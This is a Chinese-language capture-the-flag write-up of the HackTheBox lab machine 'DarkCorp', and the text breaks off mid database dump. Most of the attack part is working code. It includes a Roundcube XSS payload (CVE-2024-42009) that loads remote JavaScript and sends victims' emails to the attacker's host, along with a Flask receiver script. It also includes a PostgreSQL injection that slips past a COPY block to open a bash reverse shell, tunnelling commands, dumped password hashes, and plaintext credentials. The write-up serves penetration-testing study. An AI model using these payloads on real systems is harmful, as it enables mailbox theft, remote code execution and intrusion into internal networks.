DarkCorp
1. User
1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/htb/Scepter]
└─# nmap 10.10.11.54 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-08 12:18 EDT
Nmap scan report for 10.10.11.54
Host is up (0.44s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
| 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open http syn-ack ttl 127 nginx 1.22.1
|_http-title: Site doesn''t have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
只有22,,80端口,有点意思
1.2. web
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# curl 10.10.11.54
<meta http-equiv="refresh" content="0; url=http://drip.htb/" />
配置一下hosts
这个是一个什么邮件系统,先注册一个账号登录
登录失败就配置一下hosts $IP mail.drip.htb
点击左下角的 about 按钮可以获取到相关信息
Roundcube Webmail 是一个免费且开源的,基于 Web 的 IMAP 电子邮件客户端。
你可以在 https://www.cvedetails.com/vendor/8905/ 这里获取到有关他的历史漏洞信息
我注意到他25年存在一个代码执行的漏洞,但这应该是一个非预期,我会在Beyond Root中进行演示如何利用此漏洞
在邮件中我们得知了一个用户的邮件地址
在网页下面有一个联系方式的表单,里面可以反馈信息
抓包可以发现其收件人还有内容类型是可以被更改的
我可以尝试给自己发一个邮件
我成功收到了来自自己的邮件,邮件内容有一些附带的安全提示“可能是钓鱼邮件”
且我得知了一个安全工程师的邮箱 bcase@drip.htb
1.2.1. CVE-2024-42009 ruoundcube XSS
在查看2024年的CVE中,我发现 CVE-2024-42009的exp已经被公开
漏洞描述:允许远程攻击者通过特制的电子邮件窃取和发送受害者的电子邮件,该电子邮件滥用
program/actions/mail/show.php中message_body()这个反清理函数
1.2.1.1. poc构造
漏洞的下方提供了一个poc
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar">
Foo
</body>
由于目标网站开启了httpOnly,所以我无法窃取到cookie
0xdf在他的wp中提供了一种很好的利用方式--加载外部js. 好处就是我们无需重复发包调整我们的payload,只需要修改script.js。然后重复查看邮件即可
var script = document.createElement('script');
script.src = 'http://10.10.14.86/script.js';
document.head.appendChild(script);
这里使用JS的内置函数atob()(ASCII to Binary)来避免格式错误的问题
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7')) foo=bar">
Foo
</body>
JS的内置函数
atob()(ASCII to Binary)用于解码Base64字符串
向我自己发送带有此payload的邮件
当我查看此邮件时,我发现请求了我的script.js文件
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:10] "GET /script.js HTTP/1.1" 200 -
现在已经可以加载我们的js了。下一步我需要让其加载恶意js文件利用
我注意到没封邮件都是有一个递增的uid,我可以尝试递归获取其他用户的的邮件内容
参考0xdf提供的payload。使用如下的script.js
for (let i = 1; i <= 15; i++) {
fetch(`http://mail.drip.htb/?_task=mail&_action=show&_uid=${i}&_mbox=INBOX&_extwin=1`, {mode: 'no-cors'})
.then((resp) => resp.text())
.then((text) => fetch(`http://10.10.14.86/?id=${i}&exfil=` + btoa(text))
)
}
然后使用下面的python脚本进行接收
from flask import Flask, request, send_file
import base64
import logging
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def index():
query_string = request.query_string.decode('utf-8')
mid = None
exfil = None
for param in query_string.split('&'):
if '=' in param:
key, value = param.split('=', 1)
if key == 'id':
mid = value
elif key == 'exfil':
exfil = value
decoded = base64.b64decode(exfil)
if not b'SERVER ERROR!' in decoded:
fn = f'bcase_{mid}.html'
with open(fn, 'wb') as f:
f.write(decoded)
print(f'Wrote email to {fn}')
return 'Request received'
@app.route('/script.js')
def serve_script():
try:
return send_file('script.js', mimetype='application/javascript')
except FileNotFoundError:
return 'File not found', 404
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=False)
ps: 你可以使用beef-xss 来进行XSS攻击
1.2.1.2. 邮件窃取
然后向管理员bcase@drip.htb发送带有恶意payloadD邮件
POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 392
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNjJiZDUzZTBjNDk5ZWYwYWZhYTc2NTlkOTkzNTA2NmZmNjgzNjQxZSJ9.aWsemA.GfmjmwXHe0ripuWdQ-SFt4MVw0s
Connection: keep-alive
name=123&email=123%40123.com&message=<body+title%3d"bgcolor%3dfoo"+name%3d"bar+style%3danimation-name%3aprogress-bar-stripes+onanimationstart%3deval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7'))+foo%3dbar">
++Foo
</body>&content=html&recipient=bcase@drip.htb
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python app.py
* Serving Flask app 'app'
* Debug mode: off
Wrote email to bcase_2.html
Wrote email to bcase_1.html
Wrote email to bcase_3.html
不一会,我收到了来自管理员邮件列表。他只有三封有效的邮件
其中有一篇有效,他提示存在一个 Analytics面板,地址为dev-a3f1-01.drip.htb
登录后重置密码,然后重复上面的操作,获取到更改密码的url
然后修改密码即可登录进来
1.3. sql注入
在页面中我可以进行查询,这里输入什么查询都会报错
根据报错意思可以得知是我输入的类型不对, 他需要一个字符串类型的, 而我输入的是一个数值类型
且开启了堆叠注入
'123';select version();
目标开启了一些安全机制,搬掉了一些高危语句,比如COPY
你可以参考 https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/PostgreSQL%20Injection/#table-dump-time-based 中的技巧进行绕过
'';DO $$ DECLARE cmd text; BEGIN cmd := CHR(67) || 'OPY (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.14.86/4444 0>&1"'''; EXECUTE cmd; END $$;
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 192.168.10.14 • 192.168.1.3 • 172.18.0.1 • 172.17.0.1 • 10.10.14.86
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from drip~10.129.232.7-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/drip~10.129.232.7-Linux-x86_64/2026_01_18-04_17_59-336.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────postgres@drip:/var/lib/postgresql/15/main$ whoami
postgres
postgres@drip:/var/lib/postgresql/15/main$
postgres@drip:/var/lib$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:84:03:02 brd ff:ff:ff:ff:ff:ff
inet 172.16.20.3/24 brd 172.16.20.255 scope global eth0
valid_lft forever preferred_lft forever
postgres@drip:/var/lib$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:55953 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:323 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:58666 [::]:*
udp UNCONN 0 0 [::1]:323 [::]:*
tcp LISTEN 0 5 127.0.0.1:34281 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:993 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8001 0.0.0.0:*
tcp LISTEN 0 244 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=567,fd=5))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:143 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:587 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:32835 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:25 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
查看ip 我可以发现我当前处于一个虚拟机当中
1.4. shell as VICTOR.R
1.4.1. pgsql
postgres=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+---------------+----------+-------------+-------------+------------+-----------------+---------------------------------
dripmail | dripmail_dba | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/dripmail_dba +
| | | | | | | dripmail_dba=CTc/dripmail_dba
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc |
roundcube | roundcubeuser | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/roundcubeuser +
| | | | | | | roundcubeuser=CTc/roundcubeuser
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
(5 rows)
postgres=# \c dripmail
You are now connected to database "dripmail" as user "postgres".
dripmail=# \dt
List of relations
Schema | Name | Type | Owner
--------+--------+-------+----------
public | Admins | table | postgres
public | Users | table | postgres
(2 rows)
dripmail=# select * from "Admins";
id | username | password | email
----+----------+----------------------------------+----------------
1 | bcase | 21232f297a57a5a743894a0e4a801fc3 | bcase@drip.htb
(1 row)
dripmail=# select * from "Users";
id | username | password | email | host_header | ip_address
------+----------+----------------------------------+-------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------
5001 | support | d9b9ecbf29db8054b21f303072b37c4e | support@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5002 | bcase | 1eace53df87b9a15a37fdc11da2d298d | bcase@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5003 | ebelford | 0cebd84e066fd988e89083879e88c5f9 | ebelford@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5004 | admin | 4297f44b13955235245b2497399d7a93 | admin@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 | 172.16.20.1
(4 rows)
这里可以获取到好几个md5
21232f297a57a5a743894a0e4a801fc3
d9b9ecbf29db8054b21f303072b37c4e
1eace53df87b9a15a37fdc11da2d298d
0cebd84e066fd988e89083879e88c5f9
4297f44b13955235245b2497399d7a93
可以出来两用户, 但都是我自己设置的密码
1.4.2. 信息收集
postgres@drip:/tmp$ cat /etc/krb5.conf
[libdefaults]
default_realm = DARKCORP.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
DARKCORP.HTB = {
kdc = darkcorp.htb
admin_server = darkcorp.htb
}
[domain_realm]
postgres@drip:/var/lib/postgresql/.gnupg$ ps -ef |grep sss
root 342 1 0 Jan17 ? 00:00:00 /usr/sbin/sssd -i --logger=files
root 530 342 0 Jan17 ? 00:00:03 /usr/libexec/sssd/sssd_be --domain darkcorp.htb --uid 0 --gid 0 --logger=files
root 583 342 0 Jan17 ? 00:00:04 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 584 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 585 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
postgres 189795 149967 0 05:16 pts/3 00:00:00 grep sss
机器配置了 krb5.conf 且存在SSSD说明他是一台加了域的linux, 可能是freeIPA
postgres@drip:/var/www/html/dashboard$ cat .env
# True for development, False for production
DEBUG=False
# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development
# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>
# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets
# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
>>>> DB_USERNAME=dripmail_dba
>>>> DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432
SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = 'support@drip.htb'
在.env中可以获取到数据库密码,但我们当前是postgres用户,此密码对我们已无用
postgres@drip:/var/www/html/dashboard$ cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
>>>> bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
postgres@drip:/var/www/html/dashboard$ ls /home
bcase ebelford vmail
postgres@drip:/var/www/html/dashboard$ ls /home/ -l
total 12
>>>> drwx------ 7 bcase bcase 4096 Feb 3 2025 bcase
drwxr-xr-x 2 ebelford ebelford 4096 Feb 5 2025 ebelford
drwxr-xr-x 2 vmail vmail 4096 Dec 19 2024 vmail
bcase 用户的目录占时无法访问到
1.4.3. 内网探测
由于没有太多有价值的内容,我怀疑这台机器可能只是给我们当跳板用的。
我上传了nmap对内网进行主机探测
postgres@drip:/tmp$ ./nmap -sn 172.16.20.3/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:23 MST
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0097s latency).
Nmap scan report for 172.16.20.2
Host is up (0.017s latency).
Nmap scan report for drip.darkcorp.htb (172.16.20.3)
Host is up (0.0059s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.92 seconds
发现了3台机器,
DC-01 (172.16.20.1)
172.16.20.2
drip.darkcorp.htb (172.16.20.3) 当前机器
postgres@drip:/tmp$ ./nmap 172.16.20.2
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.16.20.2
Host is up (0.00054s latency).
Not shown: 1152 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
postgres@drip:/tmp$ ./nmap 172.16.20.1
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0015s latency).
Not shown: 1144 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos
135/tcp open epmap
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd
593/tcp open unknown
636/tcp open ldaps
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
postgres@drip:/tmp$
这里我上传了fscan再进行了一遍扫描(感觉这种还是fscan比较好用)
postgres@drip:/tmp$ ./fscan-eAbbRdOo -h 172.16.20.2/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.16.20.1 is alive
(icmp) Target 172.16.20.3 is alive
(icmp) Target 172.16.20.2 is alive
[*] Icmp alive hosts len is: 3
172.16.20.2:445 open
172.16.20.2:139 open
172.16.20.2:135 open
172.16.20.2:80 open
172.16.20.1:445 open
172.16.20.1:443 open
172.16.20.1:139 open
172.16.20.1:135 open
172.16.20.1:80 open
172.16.20.1:22 open
172.16.20.3:22 open
172.16.20.1:88 open
172.16.20.3:80 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.16.20.1 code:200 len:64 title:None
[*] WebTitle http://172.16.20.3 code:200 len:64 title:None
[*] NetInfo
[*]172.16.20.2
[->]WEB-01
[->]172.16.20.2
[*] NetInfo
[*]172.16.20.1
[->]DC-01
[->]10.129.232.7
[->]172.16.20.1
[*] NetBios 172.16.20.2 DARKCORP\WEB-01
[*] NetBios 172.16.20.1 [+] DC:DARKCORP\DC-01
[*] WebTitle https://172.16.20.1 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.16.20.2 code:200 len:703 title:IIS Windows Server
已完成 11/13 [-] ssh 172.16.20.3:22 root root_123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 11/13 [-] ssh 172.16.20.1:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
看起来并没有明显的弱口令相关漏洞
1.4.4. 内网代理
使用ligolo-ng 进行内网代理
postgres@drip:/tmp$ ./agent-AVElfFOs -connect 10.10.14.86:11601 -ignore-cert &
[1] 192953
postgres@drip:/tmp$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.86:11601"
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://127.0.0.1:8080
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed.
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.8.2
ligolo-ng » INFO[0005] Agent joined. id=00155d840302 name=postgres@drip remote="10.129.232.7:54378"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - postgres@drip - 10.129.232.7:54378 - 00155d840302
[Agent : postgres@drip] » interface_create --name drip
INFO[0023] Creating a new drip interface...
INFO[0023] Interface created!
[Agent : postgres@drip] » tunnel_start --tun drip
INFO[0048] Starting tunnel to postgres@drip (00155d840302)
[Agent : postgres@drip] » interface_add_route --name drip --route 172.16.20.3/24
INFO[0067] Route created.
[Agent : postgres@drip] »
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
^C
--- 172.16.20.1 ping statistics ---
22 packets transmitted, 0 received, 100% packet loss, time 21499ms
─(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -p 80,445,135,3389 -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:58 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (0.28s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
配置好后,但受制于postgres用户的权限较低,我无法ping通,但是可以正常访问内网
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 08:01 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (3.2s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5000/tcp open upnp
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
5000端口是一个默认的登录框
我测试了一下数据库的凭据,是没有效果的
1.4.5. pgsql backups via GPGdecrypt
我发现了很多备份文件
postgres@drip:/var/log/postgresql$ ls
postgresql-15-main.log postgresql-15-main.log.2.gz postgresql-15-main.log.5.gz postgresql-15-main.log.8.gz
postgresql-15-main.log.1 postgresql-15-main.log.3.gz postgresql-15-main.log.6.gz postgresql-15-main.log.9.gz
postgresql-15-main.log.10.gz postgresql-15-main.log.4.gz postgresql-15-main.log.7.gz
其中可以获取到ebelford的hash
postgres@drip:/var/log/postgresql$ zcat *.gz | grep ebelford
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT: UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
可以解出明文密码为ThePlague61780
此密码可以ssh登录到ebelford用户
在ebelford用户上做ligolo的agent,能够允许你进行icmp通信
┌──(root㉿kali)-[/usr/share/responder]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
64 bytes from 172.16.20.1: icmp_seq=1 ttl=64 time=313 ms
64 bytes from 172.16.20.1: icmp_seq=2 ttl=64 time=267 ms
64 bytes from 172.16.20.1: icmp_seq=3 ttl=64 time=185 ms
64 bytes from 172.16.20.1: icmp_seq=4 ttl=64 time=187 ms
64 bytes from 172.16.20.1: icmp_seq=5 ttl=64 time=278 ms
^C
--- 172.16.20.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4004ms
rtt min/avg/max/mdev = 185.184/245.832/312.658/51.272 ms
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders
(limit 70)
-rwxr--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-mLZiKDMy.sh
-rwxr--r-- 1 postgres postgres 7100304 Jan 18 05:27 /tmp/fscan-eAbbRdOo
-rwxr--r-- 1 postgres postgres 5944464 Jan 18 05:21 /tmp/nmap
-rw------- 1 postgres postgres 835 Jan 18 05:31 /tmp/result.txt
-rw-r--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-IfofOSGC.sh
-rwxr--r-- 1 postgres postgres 6475928 Jan 18 05:29 /tmp/agent-AVElfFOs
-rw-r--r-- 1 root root 6028 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_progress.bc
-rw-r--r-- 1 root root 4704 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_throttle.bc
-rw-r--r-- 1 root root 19068 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_copy.bc
-rw-r--r-- 1 root root 8320 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_lz4.bc
-rw-r--r-- 1 root root 3668 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_sink.bc
-rw-r--r-- 1 root root 7576 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_target.bc
-rw-r--r-- 1 root root 9048 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_zstd.bc
-rw-r--r-- 1 root root 13456 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/backup_manifest.bc
-rw-r--r-- 1 root root 9912 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_server.bc
-rw-r--r-- 1 root root 44976 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup.bc
-rw-r--r-- 1 root root 7888 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_gzip.bc
-rw-r--r-- 1 root root 5714 Jan 2 2025 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 2229 Dec 19 2024 /var/backups/alternatives.tar.5.gz
>>>> -rw-r--r-- 1 postgres postgres 1784 Feb 5 2025 /var/backups/postgres/dev-dripmail.old.sql.gpg
-rw-r--r-- 1 root root 32 Dec 24 2024 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 5711 Jan 6 2025 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 5714 Jan 1 2025 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 32 Dec 20 2024 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 32 Dec 19 2024 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 81920 Jan 18 00:00 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 0 Jan 18 00:00 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 32 Jan 1 2025 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 5710 Dec 24 2024 /var/backups/alternatives.tar.4.gz
使用linPEAS检测,我发现存在/var/backups/postgres/dev-dripmail.old.sql.gpg
它是一个使用GPG加密的,dev-dripmail 数据库的一个旧版 SQL 备份,且我们当前用户postgres可以读取的,
由于我们之前获取到了pg数据库密码为2Qa2SsBkQvsc
我可以尝试使用此密码对它进行解密(这里需要先引入环境变量,使其能够正常弹出密码输入框)
postgres@drip:export TERM=xterm
postgres@drip:/var/backups/postgres$ gpg --batch -d dev-dripmail.old.sql.gpg
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
"postgres <postgres@drip.darkcorp.htb>"
--
-- PostgreSQL database dump
--
-- Dumped from database version 15.10 (Debian 15.10-0+deb12u1)
-- Dumped by pg_dump version 15.10 (Debian 15.10-0+deb12u1)
SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
SET client_min_messages = warning;
SET row_security = off;
SET default_tablespace = '';
SET default_table_access_method = heap;
--
-- Name: Admins; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Admins" (
